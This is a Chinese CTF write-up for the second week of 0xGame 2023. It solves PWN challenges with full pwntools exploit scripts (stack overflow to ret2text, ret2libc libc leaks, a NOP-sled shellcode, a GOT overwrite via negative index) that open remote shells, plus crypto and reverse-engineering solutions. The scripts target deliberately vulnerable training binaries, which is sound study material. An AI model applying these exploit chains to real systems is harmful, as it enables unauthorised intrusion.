整理一下昨天该第二周了。今天应该9点结束提交等我写完就到了。
PWN
找不到且不对劲的flag
第1题是个nc测试，但也不完全是，因为flag在隐藏目录里。 高端的syscall 程序使用了危险函数，并且没有canary，gets会形成溢出。并且有后门，直接溢出到后门即可；但这个题不清楚哪里做错了，一直打不通syscall，最后只能用常规办法：先泄露libc，再ret到system("/bin/sh")。
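from pwn import *

# p = process("./ret2syscall")
p = remote("8.130.35.16", 51004)
context(arch="amd64", log_level="debug")
elf = ELF("./ret2syscall")

# Gadgets / addresses from the (non-PIE) challenge binary.
pop_rdi = 0x00000000004012e3  # pop rdi ; ret
pop_rsi = 0x00000000004012e1  # pop rsi ; pop r15 ; ret
set_rax = 0x401196            # rax setter for the syscall route (unused by the libc route below)
syscall = 0x4011ae            # syscall gadget (unused by the libc route below)
bss = 0x404800                # writable scratch address used as the fake saved rbp

# gdb.attach(p, "b *0x401273\nc")

# Stage 1: overflow -> puts(got["puts"]) to leak libc, then return to 0x401258
# (presumably main's read path) so a second payload can be sent afterwards.
# Layout: 0x10 bytes of buffer, fake saved rbp, then the ROP chain.
p.sendlineafter(b"Input: \n", flat(0, 0, bss, pop_rdi, elf.got["puts"], 0x401258))

# The leaked pointer is 6 significant bytes ending in 0x7f.  Keep only those 6
# bytes so anything printed before the address does not end up inside u64()
# (u64() on more than 8 bytes raises).
libc_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - 0x84420

# Hard-coded offsets for the remote libc (puts = 0x84420, system = 0x52290,
# "/bin/sh" = 0x1b45bd).  They only hold for that exact glibc build - check
# them against the provided libc.so.6 before reusing this script.
bin_sh = libc_addr + 0x1b45bd
system = libc_addr + 0x52290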
print(f"{libc_addr:x}")
# Stage 2: system("/bin/sh"); pop rsi also pops r15, hence the two zeros after it.
p.sendline(flat(0, 0, 0x404f00, pop_rdi, bin_sh, pop_rsi, 0, 0, system))
p.interactive()
永远进不去的后门
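/* Decompiled main() of ret2text: a 0x100-byte read() into an 8-byte stack buffer
 * (at rbp-0x40).  The intended "backdoor" compares v5 % 2023 with 2023, which can
 * never be true, so system("/bin/sh") is only reachable by overwriting the
 * return address (0x48 bytes past the start of buf: 0x40 of buffer + saved rbp). */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[8]; // [rsp+0h] [rbp-40h] BYREF
  int v5;      // [rsp+8h] [rbp-38h]

  bufinit();
  puts("Welcome to 0xGame2023!");
  puts("Tell me sth interesting, and I will give you what you want.");
  read(0, buf, 0x100uLL);            /* stack overflow: up to 0x100 bytes into buf[8] */
  if ( v5 % 2023 == 2023 )           /* never true: x % 2023 is always < 2023 */
    system("/bin/sh");
  else
    puts("Not that interesting. Bye.");
  return 0;
}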
由于 v5 % 2023 的结果不可能等于 2023，所以永远也不能直接进去，不过可以通过溢出进去。buf 在 rbp-0x40，0x40 字节缓冲区再加 8 字节保存的 rbp，偏移 0x48 处就是返回地址；通过看汇编得到调用 system 的地址（0x401298），再溢出覆盖返回地址即可。
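from pwn import *

# p = process("./ret2text")
p = remote("8.130.35.16", 51002)
context(arch="amd64", log_level="debug")

# buf lives at rbp-0x40: 0x40 bytes of buffer + 8 bytes of saved rbp, so the
# return address sits at offset 0x48.  0x401298 is the system("/bin/sh") call in
# main that the never-true "v5 % 2023 == 2023" check guards.
p.sendafter(b".\n", b"\x00" * 0x48 + p64(0x401298))
p.interactive()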
随便乱搞的shellcode
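/* Decompiled main() of the shellcode challenge: maps an RWX page at 0x20230000,
 * reads up to 0x100 bytes of user "code" into it, closes stdout and then jumps
 * to buf[rand() % 256], with rand() seeded from time(0). */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3;        // eax
  char *buf;              // [rsp+8h] [rbp-8h]
  void (*bufa)(void);     // [rsp+8h] [rbp-8h]

  bufinit(argc, argv, envp);
  /* prot 7 = PROT_READ|PROT_WRITE|PROT_EXEC, flags 34 = MAP_PRIVATE|MAP_ANONYMOUS (x86-64 Linux) */
  buf = (char *)mmap((void *)0x20230000, 0x1000uLL, 7, 34, -1, 0LL);
  puts("Now show me your code:");
  read(0, buf, 0x100uLL);
  puts("Implementing security mechanism...");
  v3 = time(0LL);
  srand(v3);
  /* execution starts at a pseudo-random offset 0..255 into the user buffer */
  bufa = (void (*)(void))&buf[rand() % 256];
  close(1);               /* stdout is gone by the time the shellcode runs */
  puts("Done!");
  bufa();
  return 0;
}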
先在 0x20230000 生成一个可写可执行的段，然后读入 shellcode 并执行。
1、这里的 rand()%256 生成一个 0~255 的偏移，程序从 buf 的这个偏移处开始执行。read 最多读 0x100 字节，把 shellcode 右对齐到 0x100 字节、前面全部补 nop（0x90），只要入口落在 nop 区就会一路滑到 shellcode，大概率命中成功。
2、close(1) 关闭了标准输出，进入 shell 后执行 `exec 1>&0`，把输出重定向到 fd 0（连接本身是双向的，从 fd 0 也能写回去）。
3、shellcode 可以直接用 pwntools 的 shellcraft.sh() 生成。
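from pwn import *

# p = process("./ret2text")
p = remote("8.130.35.16", 51003)
context(arch="amd64", log_level="debug")

# read() accepts up to 0x100 bytes and execution starts at buf[rand() % 256], so
# right-align the shellcode inside 0x100 bytes and fill the front with NOPs:
# every entry point that lands in the sled falls through into the shellcode.
p.sendafter(b":", asm(shellcraft.sh()).rjust(0x100, b"\x90"))
# fd 1 was close()d before our code ran; send the shell's stdout back over fd 0.
p.sendline(b"exec 1>&0")
p.sendline(b"cat flag")
p.interactive()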
字符串和随机数
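/* Decompiled bot() of the "strings and random numbers" challenge: a name/password
 * gate followed by a guess-the-rand() check that prints the flag. */
void __noreturn bot()
{
  int v0;          // [rsp+Ch] [rbp-14h] BYREF
  unsigned int v1; // [rsp+10h] [rbp-10h]
  int v2;          // [rsp+14h] [rbp-Ch]
  unsigned int v3; // [rsp+18h] [rbp-8h]
  char v4;         // [rsp+1Fh] [rbp-1h]

  puts("Welcome to SOC2023!.");
  printf("Name: ");
  read(0, name, 0x20uLL);      /* no NUL added: a full 0x20-byte name runs straight into what follows it in .bss */
  printf("Password: ");
  read(0, pass, 0x20uLL);      /* strcmp below needs the caller to supply the terminating NUL */
  /* only the first 5 bytes of name are compared; the password is a plaintext constant in the binary */
  if ( !strncmp(name, "admin", 5uLL) && !strcmp(pass, "1s_7h1s_p9ss_7tuIy_sAf3?") )
  {
    printf("Welcome back, %s!\n", name);   /* %s keeps printing past name when it is not NUL-terminated */
    sleep(1u);
    printf("New email from %s, title: %s", "0xGame2023 admin", "Env now up! Flag here!\n");
    printf("Wanna see it?");
    v4 = getchar();
    if ( v4 == 'y' || v4 == 89 )           /* 89 == 'Y' */
    {
      sleep(1u);
      puts("Warning! Security alert!");
      printf("Input the security code to continue: ");
      /* rand() is seeded elsewhere (the write-up says the seed sits right after name in .bss) */
      v3 = rand() ^ 0xD0E0A0D0;
      v2 = rand() ^ 0xB0E0E0F;
      v1 = (v2 ^ v3) % 0xF4240;
      __isoc99_scanf("%d", &v0);
      if ( v1 == v0 )
        printf("Email content: %s\n", flag);
      else
        perror("Challenge fail! Abort!\n");
    }
  }
  else
  {
    perror("Credential verification failed!\n");
  }
  puts("See you next time!");
  exit(0);
}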
程序先读入用户名和密码，比对成功后需要猜一个随机数。 1、在 bss 段里 seed 紧跟在 name 之后，并且 name 仅比较前 5 个字符；name 输入满 0x20 字节时 read 不会补 \0，name 和 seed 连在一起，printf("%s") 输出时就把 seed 一并泄露了。
2、pass 输入完后要带 \0 截断，因为 strcmp 比较的是完整字符串，而 read 不会自动补 \0。
3、通过 ctypes 调用同一实现的 libc 的 srand/rand，用泄露的 seed 重放出同样的随机数序列。
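from pwn import *
from ctypes import *

# p = process("./ret2text")
p = remote("8.130.35.16", 51001)
context(arch="amd64", log_level="debug")
# Same srand()/rand() implementation as the target so the sequence can be replayed.
clibc = cdll.LoadLibrary("/home/kali/glibc/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")

# Only the first 5 bytes of name are checked.  Pad to the full 0x20 so read()
# leaves no NUL and the following printf("%s", name) keeps printing into the seed.
p.sendafter(b"Name: ", b"admin".ljust(0x20))
# strcmp needs an exact match, so terminate the password ourselves.
p.sendafter(b"Password: ", b"1s_7h1s_p9ss_7tuIy_sAf3?\x00")
p.recvuntil(b"admin".ljust(0x20))
# The 4 bytes after name are the seed.  NOTE: if the seed itself contains a 0x00
# byte the %s leak stops early and p.recv(4) picks up unrelated output - rerun.
seed = u32(p.recv(4))
clibc.srand(seed)
p.sendafter(b"Wanna see it?", b"Y")
# Target computes ((rand() ^ 0xD0E0A0D0) ^ (rand() ^ 0xB0E0E0F)) % 1000000;
# XOR is associative, so the masks can be applied in any order.
v1 = (clibc.rand() ^ clibc.rand() ^ 0xD0E0A0D0 ^ 0xB0E0E0F) % 0xF4240
p.sendlineafter(b"Input the security code to continue: ", str(v1).encode())
print(p.recvline())
p.interactive()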
我后门呢
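/* Decompiled main() of ret2libc.  read() accepts 0x100 bytes into buf[32]; the
 * "no overflow" check uses strlen(), which stops at the first NUL, so a payload
 * that starts with NUL bytes passes it whatever its real length. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  bufinit();
  puts("There wont be shell for you!");
  puts("Now give me your input:");
  read(0, buf, 0x100uLL);
  if ( strlen(buf) > 0x20 )      /* strlen(), not the byte count read() returned */
  {
    puts("No chance for you to overflow!");
    exit(1);
  }
  puts("See you next time!");
  return 0;
}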
这个题应该算是 pwn 里的基础打法，前边都是教学。read 读 0x100 字节，但长度检查用的是 strlen，遇到第一个 \0 就停，所以前 0x20 字节全填 \0 就能绕过检查。先通过溢出调用 puts(got[puts]) 泄露 libc 加载地址，然后返回 main 再溢出一次，执行 system("/bin/sh")。
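from pwn import *

# p = process("./ret2text")
p = remote("8.130.35.16", 51005)
context(arch="amd64", log_level="debug")
elf = ELF("./ret2libc")
libc = ELF("./libc.so.6")

pop_rdi = 0x0000000000401333  # pop rdi ; ret
pop_rsi = 0x0000000000401331  # pop rsi ; pop r15 ; ret
bss = 0x404800                # writable address used as the fake saved rbp

PROMPT = b"Now give me your input:"

# Leading NUL bytes make strlen(buf) == 0, so the "> 0x20" check passes even
# though read() took 0x100 bytes.  buf[32] sits at rbp-0x20: after 0x20 bytes
# come the saved rbp and then the return address.
# Stage 1: puts(got["puts"]) to leak libc, then return into main for a second read.
p.sendafter(PROMPT, b"\x00" * 0x20 + flat(bss, pop_rdi, elf.got["puts"], elf.plt["puts"], elf.sym["main"]))
# keep only the 6 significant bytes of the leaked pointer (ends in 0x7f)
libc.address = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00")) - libc.sym["puts"]
print(f"{libc.address:x}")

# Stage 2: system("/bin/sh").  pop rsi also pops r15, hence the two zeros.
bin_sh = next(libc.search(b"/bin/sh\x00"))
p.sendafter(PROMPT, b"\x00" * 0x20 + flat(bss, pop_rdi, bin_sh, pop_rsi, 0, 0, libc.sym["system"]))
p.interactive()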
got-it
程序有4项add,edit,show和trick(退出时执行)
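/* Decompiled main() of got-it: a menu loop (1 add, 2 show, 3 edit, 4 exit) that
 * breaks out to trick() on the magic value 8227.  The comparison operators of
 * the two range checks were not preserved in this listing; "<=" is restored from
 * the surrounding logic (after the equality tests "<" would behave the same). */
int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  int v3; // [rsp+Ch] [rbp-4h] BYREF

  bufinit();
  while ( 1 )
  {
    menu();
    __isoc99_scanf("%d", &v3);
    if ( v3 == 8227 )
      break;
    if ( v3 <= 8227 )
    {
      if ( v3 == 4 )
      {
        puts("Thanks for using!");
        exit(0);
      }
      if ( v3 <= 4 )
      {
        switch ( v3 )
        {
          case 3:
            edit();
            break;
          case 1:
            add();
            break;
          case 2:
            show();
            break;
        }
      }
    }
  }
  trick();
}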
add在第n个list偏移处写8字节
int add()
{int v1; // [rspCh] [rbp-4h] BYREFprintf(Input student id: );__isoc99_scanf(%d, v1);if ( v1 15 )return puts(Invalid id!);printf(Input student name: );return read(0, list[8 * v1], 8uLL);
}
同理 edit 和 show 分别是改写和显示，edit 的检查和 add 一样；trick 则执行 exit("/bin/sh")，显然是要把 got[exit] 改成 system。
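/* Decompiled trick(): exit() is called with a pointer to "/bin/sh" as its
 * argument, so once got[exit] points at system() this becomes system("/bin/sh"). */
void __noreturn trick()
{
  exit((int)"/bin/sh");
}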
漏洞点：v1 是有符号数，但只检查了 v1 > 15 的上界，没有检查负数，所以索引可以向前越界。
list 位于 0x4040a0，前面就是 GOT 表，而且 GOT 没有保护（可写，应该是 Partial RELRO），可以通过负索引修改和 show GOT 表。思路是先通过负索引 show 出 got[printf] 得到 libc 基址，然后把 got[exit] 改为 system，最后输入 8227 退出循环，执行 exit("/bin/sh")，实际就成了 system("/bin/sh")。
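from pwn import *

# p = process("./got-it")
p = remote("8.130.35.16", 51006)
context(arch="amd64", log_level="debug")
elf = ELF("./got-it")
libc = ELF("./libc.so.6")

MENU = b"> "   # menu prompt as reconstructed from the write-up; check it against menu()


def add(id, v):
    """Menu option 1: write the 8 bytes v at list + 8*id (id may be negative)."""
    p.sendlineafter(MENU, b"1")
    p.sendlineafter(b"Input student id: ", str(id).encode())
    p.sendafter(b"Input student name: ", v)


def show(id):
    """Menu option 2: print the 8-byte entry at list + 8*id."""
    p.sendlineafter(MENU, b"2")
    p.sendlineafter(b"Input student id: ", str(id).encode())


add(0, b";/bin/sh")
# index -16 is list - 0x80 = got[printf]; show() prints the entry, i.e. leaks libc
show(-16)
p.recvuntil(b"Student name: ")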
libc.address = u64(p.recvuntil(b"\x7f").ljust(8, b"\x00")) - libc.sym["printf"]
# gdb.attach(p, "b *0x401477\nc")
add(-11, p64(libc.sym["system"]))   # index -11 = list - 0x58 = got[exit]
p.sendlineafter(b"> ", b"8227")     # leave the loop -> trick() -> exit("/bin/sh") -> system("/bin/sh")
p.interactive()
CRYPTO
Whats CBC?
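from Crypto.Util.number import *
from secret import flag, key


def bytes_xor(a, b):
    """XOR two byte strings via integers.

    NOTE: bytes_to_long/long_to_bytes drop leading zero bytes, so a block whose
    XOR starts with 0x00 comes back shorter than 8 bytes.
    """
    a, b = bytes_to_long(a), bytes_to_long(b)
    return long_to_bytes(a ^ b)


def pad(text):
    """Pad as the challenge does: input whose length is NOT a multiple of 8 is
    returned untouched; aligned input gets a whole extra block of 0x08 bytes."""
    if len(text) % 8:
        return text
    else:
        pad = 8 - (len(text) % 8)
        text += pad.to_bytes(1, "big") * pad
        return text


def Encrypt_CBC(text, iv, key):
    """CBC over 8-byte blocks: C_i = E(P_i ^ C_{i-1}) with C_{-1} = iv."""
    result = b""
    text = pad(text)
    block = [text[_ * 8:(_ + 1) * 8] for _ in range(len(text) // 8)]
    for i in block:
        tmp = bytes_xor(iv, i)
        iv = encrypt(tmp, key)
        result += iv
    return result


def encrypt(text, key):
    """The "block cipher": XOR every byte with the single-byte key."""
    result = b""
    for i in text:
        result += (i ^ key).to_bytes(1, "big")
    return result


iv = b"11111111"
enc = Encrypt_CBC(flag, iv, key)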
print(f"enc = {enc}")
enc = b"\x8e\xc6\xf9\xdf\xd3\xdb\xc5\x8e8q\x10f>7.5\x81\xcc\xae\x8d\x82\x8f\x92\xd9o'D6h8.d\xd6\x9a\xfc\xdb\xd3\xd1\x97\x96Q\x1d{\\TV\x10\x11"
简单的 CBC 加密方法：先生成一个 iv，每一块加密前都先把明文与 iv 异或再做加密处理，并把上一块的密文作为下一块的 iv 继续加密下一块。这里的加密比较简单，就是和 1 字节的 key 异或。（密文共 48 字节 = 6 块，最后一块是 pad 补的 8 个 0x08；原文里密文中的 `>` 和 `'` 两个字符丢失了，这里已按 flag 反推补回。）
这里先用第1块爆破一下key得到143再解密
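import itertools


def xor(a, b):
    """XOR two byte strings, cycling both to the longer length (what pwntools' xor does)."""
    n = max(len(a), len(b))
    ca = itertools.islice(itertools.cycle(a), n)
    cb = itertools.islice(itertools.cycle(b), n)
    return bytes(x ^ y for x, y in zip(ca, cb))


enc = b"\x8e\xc6\xf9\xdf\xd3\xdb\xc5\x8e8q\x10f>7.5\x81\xcc\xae\x8d\x82\x8f\x92\xd9o'D6h8.d\xd6\x9a\xfc\xdb\xd3\xd1\x97\x96Q\x1d{\\TV\x10\x11"
iv = b"11111111"
BLOCK = 8

# No brute force needed: the flag starts with "0xGame{", and the first block is
# C_0 = (P_0 ^ iv) ^ key byte-wise, so key = C_0[0] ^ iv[0] ^ ord("0")  (143 here).
key = enc[0] ^ iv[0] ^ ord("0")

# CBC decryption: P_i = D(C_i) ^ C_{i-1}, with C_{-1} = iv and D(x) = x ^ key.
prev = iv
plain = b""
for i in range(0, len(enc), BLOCK):
    cur = enc[i:i + BLOCK]
    plain += xor(xor(cur, bytes([key])), prev)
    prev = cur

# pad() appended a whole block of 0x08 bytes; the last byte says how many to strip.
flag = plain[:-plain[-1]]
print(key, flag)
# 0xGame{098f6bcd4621d373cade4e832627b4f6}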
密码觅码先有*再密
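from secret import flag  # the secret flag we are supposed to recover
from Crypto.Util.number import bytes_to_long  # encoding helpers
from base64 import b64encode  # hint: the libraries below may help - but how?
from base64 import b64decode
from gmpy2 import iroot
from Crypto.Util.number import long_to_bytes

flag = flag.encode()
lent = len(flag)
# Split the flag into four equal parts (any remainder of lent // 4 is dropped).
flag = [flag[i * (lent // 4):(i + 1) * (lent // 4)] for i in range(4)]
c1 = bytes_to_long(flag[0])
# bin() is not zero-padded: a byte below 0x80 contributes fewer than 8 bits, so
# this is only cleanly reversible in 8-bit groups when every byte of the part is >= 0x80.
c2 = "".join([str(bin(i))[2:] for i in flag[1]])
c3 = b64encode(flag[2])
c4 = flag[3].hex()
print(f"c1? = {pow(c1, 5)}\nc2 = {c2}\nc3 = {c3}\nc4 = {c4}")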
c1? = 2607076237872456265701394408859286660368327415582106508683648834772020887801353062171214554351749058553609022833985773083200356284531601339221590756213276590896143894954053902973407638214851164171968630602313844022016135428560081844499356672695981757804756591891049233334352061975924028218309004551
c2 = 10010000100001101110100010100111101000111110010010111010100001101110010010111111101000011110011010000001101011111110011010011000101011111110010110100110100000101110010010111101100101011110011110111100
c3 = b'lueggeeahO8jOmCoS5iOW8gOWniaIkQ'   （c4 是 25 字节，所以每段都是 25 字节，c3 本应是 36 个字符；页面上的 base64 字符串不完整，`+`/`=` 等字符丢失了，已无法直接解码）
c4 = 'e4bbace79a8443727970746fe68c91e68898e590a72121217d'
全是乱码那咋办嘛？python 要调用很多库，这题也是对一些库函数的测试。
分 4 段进行编码：1 是转整数再 5 次幂（没有取模，直接开 5 次方根即可），2 是转二进制，3 是 base64，4 是 16 进制，最后合起来看着是乱码。bytes 转 str 用 utf-8（默认值）。注意 c2 用的 bin() 没有 zfill(8)，按 8 位一组切分只有在这一段的每个字节都 ≥ 0x80（UTF-8 多字节字符的字节）时才正确，本题正好满足这个条件（解码结果正常）。
e1 = long_to_bytes(iroot(c1, 5)[0])
e2 = bytes([int(c2[i:i + 8], 2) for i in range(0, len(c2), 8)])
e3 = b64decode(c3)
e4 = bytes.fromhex(c4)
m = e1 + e2 + e3 + e4
m.decode()
'0xGame{ 恭喜你,已经理解了信息是如何编码的那么开始我们的Crypto挑战吧!!!}'
Take my bag!
一看吓我一跳，入门怎么会有这个。再看一下，这个背包很小，求和时没有取模，c 显然比 n 小很多，flag 没那么长，所以只用到序列中比较小的那部分项。
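from Crypto.Util.number import *
from secret import flag


def encrypt(m):
    """Knapsack sum: bit i of m (LSB first) selects init[i]; the terms are reduced
    mod n individually but the running sum is not."""
    m = str(bin(m))[2:][::-1]
    enc = 0
    for i in range(len(m)):
        enc += init[i] * int(m[i]) % n
    return enc


w = getPrime(64)
n = getPrime(512)
# w * 3^i mod n: superincreasing for as long as w * 3^i stays below n.
init = [w * pow(3, i) % n for i in range(512)]
c = encrypt(bytes_to_long(flag))
print(f"w={w}")
print(f"n={n}")
print(f"c={c}")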
w = 16221818045491479713
n = 9702074289348763131102174377899883904548584105641045150269763589431293826913348632496775173099776917930517270317586740686008539085898910110442820776001061
c = 4795969289572314590787467990865205548430190921556722879891721107719262822789483863742356553249935437004378475661668768893462652103739250038700528111
先生成一个逐渐增加的序列，每一项都大于前面所有项的和：init[i] = w·3^i mod n，只要 w·3^i < n 取模就不起作用，而 3^i 大于 3^0+…+3^(i-1)；w 是 64 位、n 是 512 位，大约前 280 项都不会回绕，flag 的位数远小于这个数。加密就是用 flag 的每一位 0/1 乘以对应项再求和。解密方法就是从大到小贪心：够减就是 1、减掉，不够减就是 0。
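w = 16221818045491479713
n = 9702074289348763131102174377899883904548584105641045150269763589431293826913348632496775173099776917930517270317586740686008539085898910110442820776001061
c = 4795969289572314590787467990865205548430190921556722879891721107719262822789483863742356553249935437004378475661668768893462652103739250038700528111

# init[i] = w * 3**i mod n.  While w * 3**i < n the reduction does nothing and the
# sequence is superincreasing (3**i > 3**0 + ... + 3**(i-1)), so the greedy
# "subtract the largest term that still fits" recovers the bits exactly.
init = [w * pow(3, i) % n for i in range(512)]
# Terms that did wrap around n are pseudo-random residues, not superincreasing,
# and must not take part in the greedy step; a flag of sane length never uses them.
usable = [v for i, v in enumerate(init) if w * pow(3, i) < n]

bits = ""
rest = c
for v in reversed(usable):          # largest term first; bit i of m multiplied init[i]
    if rest >= v:
        bits += "1"
        rest -= v
    else:
        bits += "0"
if rest:
    raise ValueError("greedy decomposition did not consume c - not a superincreasing instance")

# bits is MSB-first, i.e. the plain binary expansion of the flag's integer
# (the original chr()-per-8-bits loop produced leading NUL characters instead).
m = int(bits, 2)
flag = m.to_bytes((m.bit_length() + 7) // 8, "big")
print(flag)
# The write-up prints 0xGame{Welc0me_2_Crypt0_Gme!#$%}; the copy appears to have lost characters - trust the script output.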
BabyRSA
RSA的入门题n由小素数组成可以很容易分解。
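from Crypto.Util.number import *
from random import getrandbits
from secret import flag


def getN():
    """Product of 16 random 32-bit primes: a ~512-bit modulus that factors trivially."""
    N = 1
    for i in range(16):
        tmp = getPrime(32)
        N *= tmp
    return N


mask = getrandbits(256)
e = 65537
n = getN()
m = bytes_to_long(flag)
# The mask is published, so it only has to be divided out after decryption
# (which needs m * mask < n, i.e. a flag well under 256 bits for this n).
c = pow(m * mask, e, n)
print(f"n = {n}")
print(f"e = {e}")
print(f"c = {c}")
print(f"mask = {mask}")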
n = 93099494899964317992000886585964221136368777219322402558083737546844067074234332564205970300159140111778084916162471993849233358306940868232157447540597
e = 65537
c = 54352122428332145724828674757308827564883974087400720449151348825082737474080849774814293027988784740602148317713402758353653028988960687525211635107801
mask = 54257528450885974256117108479579183871895740052660152544049844968621224899247
这个题可以先分解 n 然后求 phi。这里我直接用 sage 里的 euler_phi 求，因为 n 由小素数组成；虽然是入门题，怎么打都可以，但如果玩 CTF 走到密码这个方向，sagemath 是绕不过去的。
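# Sage session.  n is a product of small primes, so euler_phi(n) factors it and
# gives phi directly; d = e^-1 mod phi recovers m * mask, and the published mask
# is divided out exactly once.  This relies on m * mask < n, which holds here
# (256-bit mask, 29-byte flag, ~505-bit n).
mm = pow(c, inverse_mod(e, euler_phi(n)), n)
m = int(mm) // mask                  # divide the mask out once (the original divided twice)
from Crypto.Util.number import long_to_bytes
long_to_bytes(int(m))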
b0xGame{Magic_Mth_Make_Crypt0}
猜谜
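from secret import flag, key
from Crypto.Util.number import *


def dec(text):
    """Inverse of enc(): strip the '='/'==' pad marker, map each character back to
    3 bits, drop the pad bits and rebuild the bytes.

    NOTE (as written): with no pad marker unpad stays 0, tmp[:0] is empty and
    int("", 2) raises - unpadded input cannot be decoded by this function.
    """
    text = text.decode()
    # Only indices 0..7 are ever used (3-bit groups).  The table is 63 characters
    # as printed here; presumably one character was lost in copying, which does
    # not affect the first 8 entries.
    code = "AP3IXYxn4DmwqOlT0Q/JbKFecN8isvE6gWrtoyf7M5d2pjBuk1Hh9aCRZGUVzLS"
    unpad = 0
    tmp = ""
    if (text[-1] == "=") and (text[-2:] != "=="):
        text = text[:-1]
        unpad = -1
    if text[-2:] == "==":
        text = text[:-2]
        unpad = -2
    for i in text:
        tmp += str(bin(code.index(i)))[2:].zfill(3)
    tmp = tmp[:unpad]
    result = long_to_bytes(int(tmp, 2))
    return result


def enc(text):
    """Bits of text, 3 at a time, each mapped through code[0..7]; the bit string
    is zero-padded to a multiple of 3 and '='/'==' records how many bits were added."""
    code = "AP3IXYxn4DmwqOlT0Q/JbKFecN8isvE6gWrtoyf7M5d2pjBuk1Hh9aCRZGUVzLS"
    text = "".join([str(bin(i))[2:].zfill(8) for i in text])
    length = len(text)
    pad = b""
    if length % 3 == 1:
        text += "00"
        pad = b"=="
    elif length % 3 == 2:
        text += "0"
        pad = b"="
    result = [code[int(text[3 * i:3 * (i + 1)], 2)] for i in range(0, len(text) // 3)]
    return "".join(result).encode() + pad


def encrypt(flag):
    """Byte i becomes key[i % 7] ^ (flag[i] + i).  flag[i] + i must stay below 256
    or to_bytes(1) raises, so this only works for short flags."""
    result = b""
    for i in range(len(flag)):
        result += (key[i % 7] ^ (flag[i] + i)).to_bytes(1, "big")
    return result


c = enc(encrypt(flag))
print(f"c = {c}")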
这里的 flag 先通过 encrypt 再作 enc。encrypt 里与 7 字节的 key 异或（异或前还加了下标 i），由于 flag 头部 0xGame{ 已知，可以直接求出整个 key。
enc 远远看上去像变表的 base64，但这里只用 3 位二进制查表，实际是个变表的 8 进制。意义不大，只需要再转回二进制、再转 bytes 就行了。
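import itertools


def xor(a, b):
    """XOR two byte strings, cycling both to the longer length (what pwntools' xor does)."""
    n = max(len(a), len(b))
    ca = itertools.islice(itertools.cycle(a), n)
    cb = itertools.islice(itertools.cycle(b), n)
    return bytes(x ^ y for x, y in zip(ca, cb))


# Only indices 0..7 of the table are reachable with 3-bit groups.
code = "AP3IXYxn4DmwqOlT0Q/JbKFecN8isvE6gWrtoyf7M5d2pjBuk1Hh9aCRZGUVzLS"
# The ciphertext as printed; its trailing "=" pad marker did not survive copying.
c = "IPxYIYPYXPAn3nXX3IXA3YIAPn3xAYnYnPIIPAYYIA3nxxInXAYnIPAIxnXYYYIXIIPAXn3XYXIYAA3AXnx"

# enc(): 3 bits per character -> undo the table lookup.
m = "".join(bin(code.index(ch))[2:].zfill(3) for ch in c)
# 83 * 3 = 249 bits = 31 bytes plus one pad bit; keep only the complete bytes
# (the original turned the dangling 1-bit group into a bogus extra byte).
v = bytes(int(m[i:i + 8], 2) for i in range(0, len(m) - len(m) % 8, 8))

# encrypt(): v[i] = key[i % 7] ^ (flag[i] + i), so the 7-byte key falls out of
# the known prefix "0xGame{" in one step.
known = b"0xGame{"
key = xor(v[:7], bytes(i + known[i] for i in range(7)))
v2 = xor(v, key)
flag = bytes(b - i for i, b in enumerate(v2))
print(flag)
# 0xGame{Kn0wn_pl@intext_Att@ck!}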
Vigenere
密文：0dGmqk{79ap4i0522g0a67m6i196he52357q60f} 古老而神秘的加密方式
维吉尼亚密码，可以用已知的头 0xGame{ 推出 key：x→d、G→G、a→m、m→q、e→k 的位移依次是 6、0、12、4、6，即 key 应该是 game（数字和符号不参与位移、也不消耗 key）。 REVERSE 数字筑基
前两天有个网友说大部分逆向都可以通过grep得到确实这里的几题给了些误解。 代码金丹 网络元婴 虚拟化神 v3先被填充密文然后与0xGame异或最后与明文比较。这块grep一年也出不来的。
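import itertools
import struct


def xor(a, b):
    """XOR two byte strings, cycling both to the longer length (what pwntools' xor does)."""
    n = max(len(a), len(b))
    ca = itertools.islice(itertools.cycle(a), n)
    cb = itertools.islice(itertools.cycle(b), n)
    return bytes(x ^ y for x, y in zip(ca, cb))


# v3 as the binary fills it: a 32-byte constant followed by three 32-bit
# little-endian immediates (pwntools' p32 == struct.pack("<I", ...)).
a = bytes.fromhex("0000000000004B1B7E070E01084B234C085707196A55585309557F030C541D4E")
a += struct.pack("<I", 0x50585475) + struct.pack("<I", 0x2234E52) + struct.pack("<I", 0x553045B)
# The buffer is XORed with the repeating key "0xGame" before the comparison,
# so XORing the constant with the same key yields the expected input.
key = b"0xGame"
flag = xor(a, key)
print(flag)
# 0xGame{c9fcd83d-e27a-4569-8ba1-62555b6dc6ac}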
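/* Decompiled main() of the last reverse challenge (symbols stripped; helper
 * names guessed from their arguments: sub_140001020 ~ printf, sub_140001080 ~
 * scanf("%s"), sub_1400010E0 ~ sscanf).  The decompiler shows only the fixed
 * arguments of the variadic calls, so the &v7..&v11 outputs of the sscanf are
 * not visible here.  The flag is five hex numbers checked against five linear
 * equations; every operator between terms is '+' (this reproduces the solution
 * values in the write-up). */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v3;        // rax
  __int64 v4;        // rdx
  char *v5;          // rcx
  __int64 v7;        // [rsp+40h] [rbp-148h]
  __int64 v8;        // [rsp+48h] [rbp-140h]
  __int64 v9;        // [rsp+50h] [rbp-138h]
  __int64 v10;       // [rsp+58h] [rbp-130h]
  __int64 v11;       // [rsp+60h] [rbp-128h]
  char Buffer[256];  // [rsp+70h] [rbp-118h] BYREF

  sub_140001020((char *)Format);
  sub_140001080("%s");
  v3 = -1i64;
  do
    ++v3;
  while ( Buffer[v3] );                       /* inlined strlen(Buffer) */
  if ( v3 != 44                                /* input must be exactly 44 chars ... */
    || Buffer[43] != 125                       /* ... and end in '}' */
    || (sub_1400010E0(Buffer, "0xGame{%16llx-%16llx-%16llx-%16llx-%16llx}"),
        7 * v9 + 5 * (v8 + v11) + 2 * (v10 + 4 * v7) != 0x12021DE669FC2i64)
    || (v4 = v9 + v10 + 2 * v10 + 2 * (v11 + v7), v8 + 2 * v4 + v4 != 0x159BFFC17D045i64)
    || v10 + v9 + v11 + 2 * v9 + 2 * (v9 + v11 + 2 * v9) + 2 * (v8 + 4 * v7) != 0xACE320D12501i64
    || v8 + 2 * (v7 + v11 + v9 + 2 * v10) != 0x733FFEB3A4FAi64
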